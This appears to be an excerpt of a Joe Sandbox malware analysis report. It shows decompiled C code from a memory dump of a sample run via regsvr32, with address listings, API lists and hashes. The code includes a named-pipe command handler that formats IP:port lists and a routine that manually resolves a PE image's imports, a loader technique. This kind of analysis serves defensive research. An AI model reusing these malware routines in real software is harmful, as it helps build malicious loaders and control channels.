                                                                                                                                                                        • String ID: @$\u%04X$\u%04X\u%04X
                                                                                                                                                                        • API String ID: 0-2132903582
                                                                                                                                                                        • Opcode ID: 09a223cbd91c81b2aec74119f386dc395d33e738c8b1761b4648effef375c5f8
                                                                                                                                                                        • Instruction ID: 4c8dfce8676275cc7bd46bebf05351ca19fe33ba308ebfc72aea9c439d1695ef
                                                                                                                                                                        • Opcode Fuzzy Hash: 09a223cbd91c81b2aec74119f386dc395d33e738c8b1761b4648effef375c5f8
                                                                                                                                                                        • Instruction Fuzzy Hash: AA41A271710205EBEB294EA89D9FBBE3A5DDF41314F180536FB02A6244F262FDA097D1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 049F3379 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 83%
                                                                                                                                                                        			E049F3379(void* __edi, char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				signed int _t23;
				void* _t30;
				char* _t31;
				char* _t33;
				char* _t35;
				char* _t37;
				char* _t38;
				long long* _t40;

				_t30 = __edi;
				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t35 = _a4;
				_push(_t25);
				 *_t40 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t35);
				L049F34D2();
				_t23 = _t12;
				if(_t23 < 0 || _t23 >= _a8) {
					L16:
					_t13 = _t12 | 0xffffffff;
					goto L17;
				} else {
					E049F3352(_t12, _t35);
					if(strchr(_t35, 0x2e) != 0 || strchr(_t35, 0x65) != 0) {
						L8:
						_push(_t30);
						_t37 = strchr(_t35, 0x65);
						_t31 = _t37;
						if(_t37 == 0) {
							L15:
							_t13 = _t23;
							L17:
							return _t13;
						}
						_t38 = _t37 + 1;
						_t33 = _t31 + 2;
						if( *_t38 == 0x2d) {
							_t38 = _t33;
						}
						while( *_t33 == 0x30) {
							_t33 = _t33 + 1;
						}
						if(_t33 != _t38) {
							E049E8CE0(_t38, _t33, _t23 - _t33 + _a4);
							_t23 = _t23 + _t38 - _t33;
						}
						goto L15;
					} else {
						_t6 = _t23 + 3; // 0x49f1b64
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L16;
						}
						_t35[_t23] = 0x302e;
						( &(_t35[2]))[_t23] = 0;
						_t23 = _t23 + 2;
						goto L8;
					}
				}
			}













                                                                                                                                                                        0x049f3379
                                                                                                                                                                        0x049f337c
                                                                                                                                                                        0x049f3381
                                                                                                                                                                        0x049f3385
                                                                                                                                                                        0x049f3385
                                                                                                                                                                        0x049f338b
                                                                                                                                                                        0x049f338f
                                                                                                                                                                        0x049f3390
                                                                                                                                                                        0x049f3393
                                                                                                                                                                        0x049f3394
                                                                                                                                                                        0x049f3399
                                                                                                                                                                        0x049f339c
                                                                                                                                                                        0x049f339d
                                                                                                                                                                        0x049f33a2
                                                                                                                                                                        0x049f33a9
                                                                                                                                                                        0x049f3432
                                                                                                                                                                        0x049f3432
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f33b4
                                                                                                                                                                        0x049f33b5
                                                                                                                                                                        0x049f33c7
                                                                                                                                                                        0x049f33ed
                                                                                                                                                                        0x049f33ed
                                                                                                                                                                        0x049f33f6
                                                                                                                                                                        0x049f33f8
                                                                                                                                                                        0x049f33fe
                                                                                                                                                                        0x049f342d
                                                                                                                                                                        0x049f342d
                                                                                                                                                                        0x049f3435
                                                                                                                                                                        0x049f3438
                                                                                                                                                                        0x049f3438
                                                                                                                                                                        0x049f3400
                                                                                                                                                                        0x049f3401
                                                                                                                                                                        0x049f3407
                                                                                                                                                                        0x049f3409
                                                                                                                                                                        0x049f3409
                                                                                                                                                                        0x049f340e
                                                                                                                                                                        0x049f340d
                                                                                                                                                                        0x049f340d
                                                                                                                                                                        0x049f3415
                                                                                                                                                                        0x049f3421
                                                                                                                                                                        0x049f342b
                                                                                                                                                                        0x049f342b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f33d7
                                                                                                                                                                        0x049f33d7
                                                                                                                                                                        0x049f33d7
                                                                                                                                                                        0x049f33dd
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f33df
                                                                                                                                                                        0x049f33e5
                                                                                                                                                                        0x049f33ea
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f33ea
                                                                                                                                                                        0x049f33c7

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strchr$_snprintf
                                                                                                                                                                        • String ID: %.*g
                                                                                                                                                                        • API String ID: 3619936089-952554281
                                                                                                                                                                        • Opcode ID: 4025dfa8656f7153607d9728c22a10162f96773b19e0b4f67f36d4e7526f2d4c
                                                                                                                                                                        • Instruction ID: 23263cee8c643544f47296e0ebd9c745b147e6516e158d56254dba1d4a71a6a7
                                                                                                                                                                        • Opcode Fuzzy Hash: 4025dfa8656f7153607d9728c22a10162f96773b19e0b4f67f36d4e7526f2d4c
                                                                                                                                                                        • Instruction Fuzzy Hash: 362180B274461537E7329E98DC81FAB3B4CAF81354F544135FF449B140E7A9F94043A0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 049E377F Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 306pipeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 64%
                                                                                                                                                                        			E049E377F(void* __fp0) {
				signed int _v144;
				signed int _v152;
				char _v160;
				char _v164;
				char _v168;
				signed int _v172;
				char _v176;
				intOrPtr _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				char _v200;
				signed int _v204;
				intOrPtr _t72;
				intOrPtr _t75;
				signed int _t80;
				signed int _t81;
				signed int _t84;
				signed int _t87;
				signed int _t88;
				signed int _t100;
				void* _t102;
				void* _t103;
				unsigned int* _t104;
				signed int _t110;
				signed int _t113;
				void* _t118;
				intOrPtr _t124;
				signed int _t127;
				intOrPtr _t129;
				intOrPtr _t132;
				void* _t133;
				void* _t137;
				signed int _t146;
				signed int _t148;
				signed short* _t149;
				signed int _t159;
				intOrPtr* _t183;
				void* _t187;
				void* _t188;
				void* _t189;
				signed short* _t192;
				void* _t196;
				signed int _t199;
				signed int _t200;
				signed int _t203;
				signed int _t204;
				char _t205;
				signed int _t206;
				void* _t208;
				void* _t214;
				void* _t221;

				_t221 = __fp0;
				_t208 = (_t206 & 0xfffffff8) - 0xac;
				_v144 = 0;
				_v172 = 0;
				while(1) {
					_t72 =  *0x49ff818; // 0x4bef8b0
					_push(0);
					_push( *0x49ff804);
					_v152 = 0;
					if( *((intOrPtr*)(_t72 + 0xe0))() == 0 && GetLastError() != 0x217) {
						break;
					}
					_push(0);
					_push( &_v160);
					_t75 =  *0x49ff818; // 0x4bef8b0
					_push(0x80000);
					_push( *0x49ff8bc);
					_push( *0x49ff804);
					if( *((intOrPtr*)(_t75 + 0x90))() == 0 || _v180 == 0) {
						GetLastError();
						goto L56;
					} else {
						_t149 =  *0x49ff8bc; // 0x0
						_t80 =  *_t149 & 0x0000ffff;
						_t214 = _t80 - 8;
						if(_t214 > 0) {
							_t81 = _t80 - 9;
							__eflags = _t81;
							if(_t81 == 0) {
								E049F0962( &_v200);
								L12:
								_t84 =  &_v200;
								L13:
								_push(4);
								L14:
								_push(_t84);
								_push(5);
								L31:
								_pop(_t187);
								E049ED1A6(_t187);
								L32:
								L56:
								DisconnectNamedPipe( *0x49ff804);
								_push(0);
								_pop(0);
								if(_v172 == 0) {
									continue;
								}
								break;
							}
							_t87 = _t81;
							__eflags = _t87;
							if(_t87 == 0) {
								_v204 = 0;
								_t88 = E049E171A( &_v204, _t221);
								_v188 = _t88;
								__eflags = _t88;
								if(_t88 == 0) {
									_push(4);
									_v192 = 0;
									_push( &_v192);
									L19:
									_push(0xa);
									goto L31;
								}
								_t146 = _v204;
								_t90 = _t146 * 0x16;
								_v184 = _t146 * 0x16;
								_t203 = E049E8BDE(_t90);
								_v192 = _t203;
								__eflags = _t203;
								if(_t203 == 0) {
									_t64 =  &_v192;
									 *_t64 = _v192 & 0x00000000;
									__eflags =  *_t64;
									_push(4);
									_push( &_v192);
									_t188 = 0xa;
									E049ED1A6(_t188);
									L52:
									E049E8BF4( &_v188, _t146);
									goto L32;
								}
								_t199 = 0;
								__eflags = _t146;
								if(_t146 == 0) {
									L50:
									_push(E049EA43D(_t203));
									_push(_t203);
									_t189 = 5;
									E049ED1A6(_t189);
									E049E8BF4( &_v192, 0xffffffff);
									_t208 = _t208 + 0x10;
									goto L52;
								}
								_t159 = _v188 + 4;
								__eflags = _t159;
								_v204 = _t159;
								do {
									__eflags = _t199;
									if(_t199 != 0) {
										__eflags = _t199 - _t146 - 1;
										if(_t199 < _t146 - 1) {
											_t102 = E049EA43D(_t203);
											_t159 = _v204;
											 *((short*)(_t102 + _t203)) = 0x3b;
										}
									}
									_t100 =  *_t159;
									_v196 = _t100;
									__eflags = _t100;
									if(_t100 != 0) {
										_t103 = E049EA43D(_t203);
										_t104 = _v204;
										_push(_t104[1] & 0x0000ffff);
										_push( *_t104 >> 0x18);
										_push(_t104[0] & 0x000000ff);
										_push(_t104[0] & 0x000000ff);
										_t110 = E049EA43D(_t203) + _t203;
										__eflags = _t110;
										E049E9E12(_t110, _v184 - _t103, "%u.%u.%u.%u:%u", _v196 & 0x000000ff);
										_t159 = _v204;
										_t208 = _t208 + 0x20;
									}
									_t199 = _t199 + 1;
									_t159 = _t159 + 0x20;
									_v204 = _t159;
									__eflags = _t199 - _t146;
								} while (_t199 < _t146);
								goto L50;
							}
							__eflags = _t87 != 1;
							if(_t87 != 1) {
								goto L56;
							}
							_v204 = 0;
							_t113 = E049E171A( &_v204, _t221);
							_t204 = _v204;
							_v196 = _t113;
							__eflags = _t113;
							if(_t113 != 0) {
								E049E8BF4( &_v196, _t204);
							}
							_v204 = _t204 * 0x16;
							_t84 =  &_v204;
							goto L13;
						}
						if(_t214 == 0) {
							_t84 = E049F0962( &_v200);
							L16:
							__eflags = _t84;
							if(_t84 == 0) {
								_push(0);
								_push(0);
								goto L19;
							}
							_push(_v200);
							goto L14;
						}
						_t118 = _t80 - 1;
						if(_t118 == 0) {
							_t200 = E049E9B33( &(_t149[4]), 0x20, 1,  &_v176);
							_v196 = _t200;
							__eflags = _t200;
							if(_t200 == 0) {
								L30:
								_t192 =  *0x49ff8bc; // 0x0
								E049E9EDB( &_v164,  &(_t192[4]), 0x80);
								_push(0x84);
								_push( &_v168);
								_push(2);
								goto L31;
							}
							_t205 = _v176;
							__eflags = _t205 - 1;
							if(__eflags <= 0) {
								_t124 = E049E1DD3(E049E9F6F( *_t200, __eflags), 0, 0, 0);
								_t208 = _t208 + 0x10;
								_v168 = _t124;
								goto L30;
							}
							_t125 = _t205 - 1;
							_v184 = _t205 - 1;
							_t127 = E049E8BDE(_t125 << 2);
							_v188 = _t127;
							__eflags = _t127;
							if(_t127 == 0) {
								goto L30;
							}
							_t148 = 1;
							__eflags = _t205 - 1;
							if(__eflags <= 0) {
								L28:
								_t129 = E049E1DD3(E049E9F6F( *_t200, __eflags), _t127, _v184, 0);
								_t208 = _t208 + 0x10;
								_v168 = _t129;
								E049E9C2C( &_v176);
								goto L30;
							}
							_v204 = _t127;
							do {
								_t132 = E049E9880( *((intOrPtr*)(_t200 + _t148 * 4)), E049EA43D( *((intOrPtr*)(_t200 + _t148 * 4))));
								_t183 = _v204;
								_t148 = _t148 + 1;
								 *_t183 = _t132;
								_v204 = _t183 + 4;
								__eflags = _t148 - _t205;
							} while (__eflags < 0);
							_t127 = _v188;
							goto L28;
						}
						_t133 = _t118 - 3;
						if(_t133 == 0) {
							_push(0);
							_push(0);
							_t196 = 5;
							E049E5EC3(E049ED1A6(_t196));
							_v172 = 1;
							goto L56;
						}
						_t137 = _t133;
						if(_t137 == 0) {
							_t84 = E049F0940( &_v200);
							goto L16;
						}
						if(_t137 != 1) {
							goto L56;
						}
						E049F0940( &_v200);
						goto L12;
					}
				}
				return 0;
			}
























































                                                                                                                                                                        0x049e377f
                                                                                                                                                                        0x049e3785
                                                                                                                                                                        0x049e3790
                                                                                                                                                                        0x049e3794
                                                                                                                                                                        0x049e3798
                                                                                                                                                                        0x049e3798
                                                                                                                                                                        0x049e379d
                                                                                                                                                                        0x049e379e
                                                                                                                                                                        0x049e37a4
                                                                                                                                                                        0x049e37b0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e37c3
                                                                                                                                                                        0x049e37c8
                                                                                                                                                                        0x049e37c9
                                                                                                                                                                        0x049e37ce
                                                                                                                                                                        0x049e37d3
                                                                                                                                                                        0x049e37d9
                                                                                                                                                                        0x049e37e7
                                                                                                                                                                        0x049e3af7
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e37f8
                                                                                                                                                                        0x049e37f8
                                                                                                                                                                        0x049e37fe
                                                                                                                                                                        0x049e3801
                                                                                                                                                                        0x049e3804
                                                                                                                                                                        0x049e3976
                                                                                                                                                                        0x049e3976
                                                                                                                                                                        0x049e3979
                                                                                                                                                                        0x049e3aed
                                                                                                                                                                        0x049e3833
                                                                                                                                                                        0x049e3834
                                                                                                                                                                        0x049e3838
                                                                                                                                                                        0x049e3838
                                                                                                                                                                        0x049e383a
                                                                                                                                                                        0x049e383a
                                                                                                                                                                        0x049e383b
                                                                                                                                                                        0x049e395a
                                                                                                                                                                        0x049e395a
                                                                                                                                                                        0x049e395b
                                                                                                                                                                        0x049e3960
                                                                                                                                                                        0x049e3afd
                                                                                                                                                                        0x049e3b03
                                                                                                                                                                        0x049e3b0e
                                                                                                                                                                        0x049e3b10
                                                                                                                                                                        0x049e3b11
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e3b11
                                                                                                                                                                        0x049e3980
                                                                                                                                                                        0x049e3980
                                                                                                                                                                        0x049e3983
                                                                                                                                                                        0x049e39c8
                                                                                                                                                                        0x049e39cc
                                                                                                                                                                        0x049e39d1
                                                                                                                                                                        0x049e39d5
                                                                                                                                                                        0x049e39d7
                                                                                                                                                                        0x049e3ad8
                                                                                                                                                                        0x049e3ade
                                                                                                                                                                        0x049e3ae2
                                                                                                                                                                        0x049e3859
                                                                                                                                                                        0x049e3859
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e3859
                                                                                                                                                                        0x049e39dd
                                                                                                                                                                        0x049e39e1
                                                                                                                                                                        0x049e39e5
                                                                                                                                                                        0x049e39ee
                                                                                                                                                                        0x049e39f0
                                                                                                                                                                        0x049e39f5
                                                                                                                                                                        0x049e39f7
                                                                                                                                                                        0x049e3ab2
                                                                                                                                                                        0x049e3ab2
                                                                                                                                                                        0x049e3ab2
                                                                                                                                                                        0x049e3abb
                                                                                                                                                                        0x049e3abd
                                                                                                                                                                        0x049e3ac0
                                                                                                                                                                        0x049e3ac1
                                                                                                                                                                        0x049e3ac8
                                                                                                                                                                        0x049e3ace
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e3ace
                                                                                                                                                                        0x049e39fd
                                                                                                                                                                        0x049e39ff
                                                                                                                                                                        0x049e3a01
                                                                                                                                                                        0x049e3a90
                                                                                                                                                                        0x049e3a97
                                                                                                                                                                        0x049e3a98
                                                                                                                                                                        0x049e3a9b
                                                                                                                                                                        0x049e3a9c
                                                                                                                                                                        0x049e3aa8
                                                                                                                                                                        0x049e3aad
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e3aad
                                                                                                                                                                        0x049e3a0b
                                                                                                                                                                        0x049e3a0b
                                                                                                                                                                        0x049e3a0e
                                                                                                                                                                        0x049e3a12
                                                                                                                                                                        0x049e3a12
                                                                                                                                                                        0x049e3a14
                                                                                                                                                                        0x049e3a19
                                                                                                                                                                        0x049e3a1b
                                                                                                                                                                        0x049e3a1e
                                                                                                                                                                        0x049e3a24
                                                                                                                                                                        0x049e3a28
                                                                                                                                                                        0x049e3a28
                                                                                                                                                                        0x049e3a1b
                                                                                                                                                                        0x049e3a2e
                                                                                                                                                                        0x049e3a30
                                                                                                                                                                        0x049e3a34
                                                                                                                                                                        0x049e3a36
                                                                                                                                                                        0x049e3a39
                                                                                                                                                                        0x049e3a40
                                                                                                                                                                        0x049e3a49
                                                                                                                                                                        0x049e3a4f
                                                                                                                                                                        0x049e3a54
                                                                                                                                                                        0x049e3a5d
                                                                                                                                                                        0x049e3a75
                                                                                                                                                                        0x049e3a75
                                                                                                                                                                        0x049e3a78
                                                                                                                                                                        0x049e3a7d
                                                                                                                                                                        0x049e3a81
                                                                                                                                                                        0x049e3a81
                                                                                                                                                                        0x049e3a84
                                                                                                                                                                        0x049e3a85
                                                                                                                                                                        0x049e3a88
                                                                                                                                                                        0x049e3a8c
                                                                                                                                                                        0x049e3a8c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e3a12
                                                                                                                                                                        0x049e3985
                                                                                                                                                                        0x049e3988
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e3992
                                                                                                                                                                        0x049e3996
                                                                                                                                                                        0x049e399b
                                                                                                                                                                        0x049e399f
                                                                                                                                                                        0x049e39a3
                                                                                                                                                                        0x049e39a5
                                                                                                                                                                        0x049e39ad
                                                                                                                                                                        0x049e39b3
                                                                                                                                                                        0x049e39b7
                                                                                                                                                                        0x049e39bb
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e39bb
                                                                                                                                                                        0x049e380a
                                                                                                                                                                        0x049e396c
                                                                                                                                                                        0x049e384c
                                                                                                                                                                        0x049e384d
                                                                                                                                                                        0x049e384f
                                                                                                                                                                        0x049e3857
                                                                                                                                                                        0x049e3858
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e3858
                                                                                                                                                                        0x049e3851
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e3851
                                                                                                                                                                        0x049e3810
                                                                                                                                                                        0x049e3813
                                                                                                                                                                        0x049e388f
                                                                                                                                                                        0x049e3891
                                                                                                                                                                        0x049e3897
                                                                                                                                                                        0x049e3899
                                                                                                                                                                        0x049e3936
                                                                                                                                                                        0x049e3936
                                                                                                                                                                        0x049e3948
                                                                                                                                                                        0x049e394e
                                                                                                                                                                        0x049e3957
                                                                                                                                                                        0x049e3958
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e3958
                                                                                                                                                                        0x049e389f
                                                                                                                                                                        0x049e38a3
                                                                                                                                                                        0x049e38a6
                                                                                                                                                                        0x049e392a
                                                                                                                                                                        0x049e392f
                                                                                                                                                                        0x049e3932
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e3932
                                                                                                                                                                        0x049e38a8
                                                                                                                                                                        0x049e38ab
                                                                                                                                                                        0x049e38b3
                                                                                                                                                                        0x049e38b8
                                                                                                                                                                        0x049e38bd
                                                                                                                                                                        0x049e38bf
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e38c3
                                                                                                                                                                        0x049e38c4
                                                                                                                                                                        0x049e38c6
                                                                                                                                                                        0x049e38f5
                                                                                                                                                                        0x049e3904
                                                                                                                                                                        0x049e3909
                                                                                                                                                                        0x049e390c
                                                                                                                                                                        0x049e3918
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e3918
                                                                                                                                                                        0x049e38c8
                                                                                                                                                                        0x049e38cc
                                                                                                                                                                        0x049e38da
                                                                                                                                                                        0x049e38df
                                                                                                                                                                        0x049e38e3
                                                                                                                                                                        0x049e38e4
                                                                                                                                                                        0x049e38e9
                                                                                                                                                                        0x049e38ed
                                                                                                                                                                        0x049e38ed
                                                                                                                                                                        0x049e38f1
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e38f1
                                                                                                                                                                        0x049e3815
                                                                                                                                                                        0x049e3818
                                                                                                                                                                        0x049e3860
                                                                                                                                                                        0x049e3861
                                                                                                                                                                        0x049e3864
                                                                                                                                                                        0x049e386c
                                                                                                                                                                        0x049e3871
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e3871
                                                                                                                                                                        0x049e381b
                                                                                                                                                                        0x049e381e
                                                                                                                                                                        0x049e3847
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e3847
                                                                                                                                                                        0x049e3823
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e382e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e382e
                                                                                                                                                                        0x049e37e7
                                                                                                                                                                        0x049e3b1f

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 049E37B2
                                                                                                                                                                          • Part of subcall function 049ED1A6: FlushFileBuffers.KERNEL32(00000000,?,049E3AC6,00000000,00000004), ref: 049ED1EC
                                                                                                                                                                        • DisconnectNamedPipe.KERNEL32 ref: 049E3B03
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: BuffersDisconnectErrorFileFlushLastNamedPipe
                                                                                                                                                                        • String ID: %u.%u.%u.%u:%u
                                                                                                                                                                        • API String ID: 465096328-3858738763
                                                                                                                                                                        • Opcode ID: 429bdee1231b7a9518c1bae6c410794e1ab435cef57eaa0de78d66c253201c4e
                                                                                                                                                                        • Instruction ID: 8a9516393a3cfb0569294401719c45921ad77eb35c7f67167658a374100512ad
                                                                                                                                                                        • Opcode Fuzzy Hash: 429bdee1231b7a9518c1bae6c410794e1ab435cef57eaa0de78d66c253201c4e
                                                                                                                                                                        • Instruction Fuzzy Hash: EDA1A1B2608301AFE326EF66D884E3BB7ECEB84314F44493EF95597180EB35E9458B51
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 049F370B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151libraryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                                        			E049F370B(signed int __eax, void* __ecx, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				void* _t163;
				void* _t167;

				_t167 = __ecx;
				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E049EEFA7(_t167, _v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_t34 = _v8 + 0xc; // 0xffff
						_v36 = LoadLibraryA( *_t34 + _a4);
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_t43 = _v8 + 0x10; // 0xb8
								_v12 =  *_t43 + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_t73 = _v8 + 0x10; // 0xb8
									_v24 =  *((intOrPtr*)( *_t73 + _a4 + _v28));
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										_t89 = _v8 + 0x10; // 0xb8
										 *( *_t89 + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}























                                                                                                                                                                        0x049f370b
                                                                                                                                                                        0x049f3711
                                                                                                                                                                        0x049f3719
                                                                                                                                                                        0x049f372e
                                                                                                                                                                        0x049f3740
                                                                                                                                                                        0x049f374c
                                                                                                                                                                        0x049f3752
                                                                                                                                                                        0x049f3757
                                                                                                                                                                        0x049f3763
                                                                                                                                                                        0x049f38ce
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f38ce
                                                                                                                                                                        0x049f3769
                                                                                                                                                                        0x049f3772
                                                                                                                                                                        0x049f3780
                                                                                                                                                                        0x049f3783
                                                                                                                                                                        0x049f3792
                                                                                                                                                                        0x049f3792
                                                                                                                                                                        0x049f3799
                                                                                                                                                                        0x049f37a7
                                                                                                                                                                        0x049f37aa
                                                                                                                                                                        0x049f37ba
                                                                                                                                                                        0x049f37c7
                                                                                                                                                                        0x049f37ce
                                                                                                                                                                        0x049f37de
                                                                                                                                                                        0x049f37f0
                                                                                                                                                                        0x049f37f6
                                                                                                                                                                        0x049f37e0
                                                                                                                                                                        0x049f37e8
                                                                                                                                                                        0x049f37e8
                                                                                                                                                                        0x049f37f9
                                                                                                                                                                        0x049f37fd
                                                                                                                                                                        0x049f3809
                                                                                                                                                                        0x049f380d
                                                                                                                                                                        0x049f3811
                                                                                                                                                                        0x049f3815
                                                                                                                                                                        0x049f3821
                                                                                                                                                                        0x049f384c
                                                                                                                                                                        0x049f3854
                                                                                                                                                                        0x049f385a
                                                                                                                                                                        0x049f3866
                                                                                                                                                                        0x049f3872
                                                                                                                                                                        0x049f3823
                                                                                                                                                                        0x049f3828
                                                                                                                                                                        0x049f3833
                                                                                                                                                                        0x049f383f
                                                                                                                                                                        0x049f383f
                                                                                                                                                                        0x049f387b
                                                                                                                                                                        0x049f3881
                                                                                                                                                                        0x049f388b
                                                                                                                                                                        0x049f38a7
                                                                                                                                                                        0x049f388d
                                                                                                                                                                        0x049f3890
                                                                                                                                                                        0x049f389c
                                                                                                                                                                        0x049f389c
                                                                                                                                                                        0x049f388b
                                                                                                                                                                        0x049f38af
                                                                                                                                                                        0x049f38b8
                                                                                                                                                                        0x049f38b8
                                                                                                                                                                        0x049f38c6
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f38c6
                                                                                                                                                                        0x049f37d2
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f37d2
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f37aa
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 049F3728
                                                                                                                                                                        • LoadLibraryA.KERNEL32(00000000), ref: 049F37C1
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HandleLibraryLoadModule
                                                                                                                                                                        • String ID: GetProcAddress$kernel32.dll
                                                                                                                                                                        • API String ID: 4133054770-1584408056
                                                                                                                                                                        • Opcode ID: 8afdc9d98a2a998b930f9ac1a969081a7f015d4a0d296eb7db1b63847098f62b
                                                                                                                                                                        • Instruction ID: 0fa8eb443a2de66faf8807245064ef6443f4dba5135b143ed12fd68e5b0ebce9
                                                                                                                                                                        • Opcode Fuzzy Hash: 8afdc9d98a2a998b930f9ac1a969081a7f015d4a0d296eb7db1b63847098f62b
                                                                                                                                                                        • Instruction Fuzzy Hash: 7D617F75E10209EFDB10CF98C885BADBBF1FF48315F2485A9E915AB251D378AA80DF50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 049F4100 Relevance: 6.6, APIs: 5, Instructions: 341COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 99%
